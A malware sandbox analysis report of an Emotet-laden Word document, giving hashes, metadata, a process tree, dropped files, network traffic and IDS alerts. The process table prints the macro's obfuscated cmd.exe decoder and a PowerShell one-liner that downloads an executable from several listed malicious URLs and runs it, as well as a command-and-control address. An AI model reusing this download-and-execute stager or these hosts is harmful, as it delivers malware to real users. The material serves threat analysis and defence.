download: | 11_18 |
Full analysis: | https://app.any.run/tasks/faa0b010-01b3-44e6-9528-2de8a707a664 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | November 14, 2018, 14:55:39 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Ryder, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Nov 14 12:45:00 2018, Last Saved Time/Date: Wed Nov 14 12:45:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0 |
MD5: | 04CFEE9D5670593CDD757C4A6AF8B5D1 |
SHA1: | BC92C2131EC12B92C8A7AC1B6F5655769BE4E0B0 |
SHA256: | 9F8F9470663BB4C1DCA15733E1CFF0E882C931ED0CA6E9EEEFA0F535DF501229 |
SSDEEP: | 1536:YZuocn1kp59gxBK85fBt+a9wV6r2EBDxoRwBnRDhYxjhUx5xfxThoxtBqBYRM6UB:441k/W48RFDxoRwBnRDhYxjhUx5xfxTN |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | Ryder |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2018:11:14 12:45:00 |
ModifyDate: | 2018:11:14 12:45:00 |
Pages: | 1 |
Words: | 2 |
Characters: | 13 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 14 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3008 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\11_18.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3444 | cmd /V/C"^se^t ^oI^Q^1=AO(B=2@^a8^U^T^EICG^iS^[^Xk^y\6rc nbF^f^xo^$^e+^Y^WVp^m;^M3/^{^uqt^jLRP^-'^]^Kh^:^d^D^H^,N)^s^.w}0lv1&&^f^or %N ^in (3^8^;^3^1;^6^6;^3^3;23;6^4^;^56^;3^3^;69^;6^9;25^;3^2;1^5;5^8^;4^9^;4;^53^;^5^0^;^2^7^;^45;53^;^40^;^32^;^1^5^;^51;37;^4;5^3^;5^6^;47^;^4^7;^3^8^;^57^;43^;43^;^24;^52;^4^7^;6^5^;24^;31;^39;^6^5;7^;4^5;4^3;51;64^;38^;0^;41^;27^;45^;^1^6;58;5;^6^;^5^6^;^47;^47;^3^8;^5^7;43^;43;64;^56^;^7^;48;^1^5;64;^5^6^;^7;^6^9^;3^1;39;^65;^2^4^;^31^;39^;^43^;28;^1;60;22;^42^;22^;^46;^3^7^;6;5^6;4^7;4^7;^3^8^;5^7;4^3^;4^3^;^38;^47;^3^3^;^7;^2^4;^7;^58;33;^3^9;^1^5;24;^7^0^;^3^1;^45^;2^4;56;3^3^;2^3;65^;^15^;26^;^43^;8^;^6^9;^37^;^23^;^45;3^6;7;^6;56;^47^;47;^3^8;57^;4^3^;43;^8;22^;^2^2;^7;3^8;^3^8;^6^9^;15^;^7;^26;2^4;33^;^65;^2^4;3^1^;^3^9^;^43;^3^5;^22;^10;0;3^8^;24;^18^;8;0;^6^;^5^6^;^47^;4^7^;38;5^7^;^4^3^;^4^3^;3^8^;^69^;7;26;^3^3^;47;3^3;^2^9;7;^4^5^;2^6;33;^65^;^24^;^31;39^;4^3;^20;45;7;^1^5^;^4^8;^49^;9^;^1^4^;^6^9^;^6^2;^5^3^;^6^5;^1^6^;^3^8;69^;1^5^;^47;2;^5^3;6;5^3;^6^3^;4^0;32;^0;35;^13;4^;^2;^17^;1^6;20^;^6^4;^47^;^33^;^39;6^5;^12^;^1;6^5;^5^1^;^7;4^7;56^;^5^4^;^57^;5^7^;1^4;33^;^47;^10;3^3^;3^9;^38^;5^1;7;47;56;^2^;^6^3^;34;53^;^21^;4^9^;^55^;18;^6^5^;^3^3;30^;^33;53^;63;40^;^3^2;36^;^9^;5^6^;2^5^;^4^;^6^2;^3^3^;66;^5^2;^1;^2^7;48^;3^3;^2^4^;^4^7;2^5;^52;2^4;^3^1;^3^9^;^2^5;5^3^;39;^6^4;3^0^;^3^9;^69^;^5;^65^;30;^3^9;^6^9^;^56^;47^;47;^38^;5^3;^40;3^2;48;4^5^;^1^8;^25;^4^;^25^;^62^;33;^6^6^;5^2^;1;^27;^4^8^;^33;^24^;47;2^5;^5^2;2^4^;3^1;^3^9^;2^5^;^5^3^;^7^;^5^8^;31^;^5^8^;27^;6^5^;^64;^4^7^;23^;33^;^7;^39;5^3;4^0^;29;^3^1^;^2^3^;33;7;^24;^5^6^;2^;32;^37^;49;5^9;25^;1^5^;26;25^;32;15^;51^;3^7;6^3;4^4^;47;^2^3;20^;4^4;3^2;36^;^9;56^;^65^;31^;^38;^3^3^;^2^6;2;^5^3;14^;1^1;^1^0^;5^3;^61^;3^2;^37;4^9^;59;61;68^;6^3^;^40;^32;^3^6;^9;^56^;6^5^;6^4;^3^3^;^26^;^5^8;^2^;6^3;4^0^;^3^2^;^4^8;^45;1^8^;65;^3^1^;38;3^3^;26;^2;^6^3;40;32;^48^;^4^5^;1^8;65;47;20^;38;^3^3^;^2^5^;^4;^25^;^7^1;40^;^3^2;^48^;^45;^18;^65^;^6^6^;^23^;^15;^47;^33^;^2^;^3^2;^36^;9^;5^6;^6^5^;2^3^;^3^3;^64;3^8;^31^;^26;6^4^;3^3^;^3;3^1^;^58;^2^0^;63;4^0^;^3^2;^48;45^;1^8;^6^5^;^64^;^7^;70;3^3^;^47;^31;29;1^5;^6^9^;33;2;32^;^0^;^3^5^;13^;6^3^;^40^;^16^;^47^;^7^;23;4^7;5^2^;^5^1^;23;3^1^;^2^4;^33^;6^4;^64;^25^;32;^0;3^5;13^;40;^2^7^;23;^33^;7;1^9^;67^;2^4;7;4^7;^2^4;56^;^44^;6^7;67;^2^5;25^;^25^;^25;^25;^25^;2^5;25^;^2^5;2^5;2^5;^2^5^;25^;^25;2^5;2^5^;2^5^;82)^do ^s^e^t u^1^e^J=!u^1^e^J!!^oI^Q^1:~%N,1!&&^i^f %N ^g^tr ^81 cal^l %u^1^e^J:*u1e^J^!^=%" | C:\Windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1364 | powershell $idL='Rbu';$iPV='http://c-t.com.au/PspAMbuSd2@http://shajishalom.com/FOH636qV@http://pteacademicvoucher.in/8lVruWa@http://866appliance.com/Y6TApcX8A@http://planetefaune.com/yuaijLUGlN'.Split('@');$AYC=([System.IO.Path]::GetTempPath()+'\LKX.exe');$WUh =New-Object -com 'msxml2.xmlhttp';$juX = New-Object -com 'adodb.stream';foreach($VLD in $iPV){try{$WUh.open('GET',$VLD,0);$WUh.send();$juX.open();$juX.type = 1;$juX.write($WUh.responseBody);$juX.savetofile($AYC);Start-Process $AYC;break}catch{}} | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3700 | "C:\Users\admin\AppData\Local\Temp\LKX.exe" | C:\Users\admin\AppData\Local\Temp\LKX.exe | — | powershell.exe |
User: admin Company: Borland Corporation Integrity Level: MEDIUM Description: Borland C++ Multi-thread RTL (WIN/VCL MT) Exit code: 0 Version: 8.0.0.0 | ||||
3856 | "C:\Users\admin\AppData\Local\Temp\LKX.exe" | C:\Users\admin\AppData\Local\Temp\LKX.exe | LKX.exe | |
User: admin Company: Borland Corporation Integrity Level: MEDIUM Description: Borland C++ Multi-thread RTL (WIN/VCL MT) Exit code: 0 Version: 8.0.0.0 | ||||
1352 | "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe" | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | LKX.exe | |
User: admin Company: Borland Corporation Integrity Level: MEDIUM Description: Borland C++ Multi-thread RTL (WIN/VCL MT) Exit code: 0 Version: 8.0.0.0 | ||||
3828 | "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe" | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | lpiograd.exe | |
User: admin Company: Borland Corporation Integrity Level: MEDIUM Description: Borland C++ Multi-thread RTL (WIN/VCL MT) Version: 8.0.0.0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3008 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA004.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1364 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5AW9DS1OO86P6V0V87UP.temp | — | |
MD5:— | SHA256:— | |||
1364 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5daf08.TMP | binary | |
MD5:3C6A7AAE234382390B6B52F47ECA1BAA | SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2 | |||
3008 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:256A3EF47ED32A3D3038855D49DF0319 | SHA256:151B56C71BC28DD4D752808CE3A9352E96D9FA381320511F87B327A8208F5DD0 | |||
1364 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:3C6A7AAE234382390B6B52F47ECA1BAA | SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2 | |||
3008 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$11_18.doc | pgc | |
MD5:D349B07373F2B1B71ACB49F706A6B285 | SHA256:270FA24982D1AF02B891303264D54E7D9CC3B3A04BDA460A1BBD5D939793CB6D | |||
3856 | LKX.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | executable | |
MD5:1971BD3C2B25CE33550085B93144EBFB | SHA256:D6DD56E7FB1CC71FC37199B60461E657726C3BF8319CE59177AB4BE6ED3B9FB4 | |||
1364 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\IETldCache\index.dat | dat | |
MD5:D7A950FEFD60DBAA01DF2D85FEFB3862 | SHA256:75D0B1743F61B76A35B1FEDD32378837805DE58D79FA950CB6E8164BFA72073A | |||
1364 | powershell.exe | C:\Users\admin\AppData\Local\Temp\LKX.exe | executable | |
MD5:1971BD3C2B25CE33550085B93144EBFB | SHA256:D6DD56E7FB1CC71FC37199B60461E657726C3BF8319CE59177AB4BE6ED3B9FB4 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1364 | powershell.exe | GET | 301 | 50.62.194.30:80 | http://c-t.com.au/PspAMbuSd2 | US | html | 196 b | suspicious |
3828 | lpiograd.exe | GET | 200 | 50.78.167.65:7080 | http://50.78.167.65:7080/ | US | binary | 132 b | malicious |
1364 | powershell.exe | GET | 200 | 50.62.194.30:80 | http://c-t.com.au/PspAMbuSd2/ | US | executable | 420 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1364 | powershell.exe | 50.62.194.30:80 | c-t.com.au | GoDaddy.com, LLC | US | suspicious |
3828 | lpiograd.exe | 50.78.167.65:7080 | — | Comcast Cable Communications, LLC | US | malicious |
Domain | IP | Reputation |
---|---|---|
c-t.com.au |
| unknown |
PID | Process | Class | Message |
---|---|---|---|
1364 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
1364 | powershell.exe | A Network Trojan was detected | ET CURRENT_EVENTS Likely Evil EXE download from MSXMLHTTP non-exe extension M2 |
1364 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3828 | lpiograd.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |